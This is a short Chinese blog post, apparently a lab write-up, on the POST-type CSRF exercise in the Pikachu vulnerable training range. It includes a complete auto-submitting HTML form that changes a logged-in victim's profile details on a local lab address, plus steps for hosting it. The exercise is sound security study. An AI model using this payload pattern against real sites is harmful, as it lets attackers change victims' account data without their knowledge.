pikachu靶场之csrf(2)

上一次,我们试验了get型的csrf漏洞,get型漏洞比较好处理,只要构造链接,然后让别人

点击,就可以修改别人的东西,绕过登录权限。

这次,我们试验post型的漏洞,post型漏洞,虽然没有加密,但通过构造链接的方法,已经不行了

我们需要通过构建网站,然后让对方点击网站,就可以修改对方信息。

 

我们首先打开post型csrf漏洞,打开bp抓包,查 看是那种形式的csrf漏洞。

 

 之后需要构造网站,然后换一个账号点击。看是否能成功。

<html>
<head>
<script>
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://192.168.36.140/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php">
     <input id="sex" type="text" name="sex" value="boy" />
     <input id="phonenum" type="text" name="phonenum" value="54213" />
     <input id="add" type="text" name="add" value="hacker" />
     <input id="email" type="text" name="email" value="allen@pikachu.com" />
     <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

  构造表单,然后将表单放在xampp集成环境下的网站文件夹中。

利用apache打开网站,利用另外一个账号登录后,复制链接,打开网站。

便可以改变信息。(同一个账号也可以)

posted @ 2020-08-12 10:50  ccddddddddd  阅读(181)  评论(0编辑  收藏  举报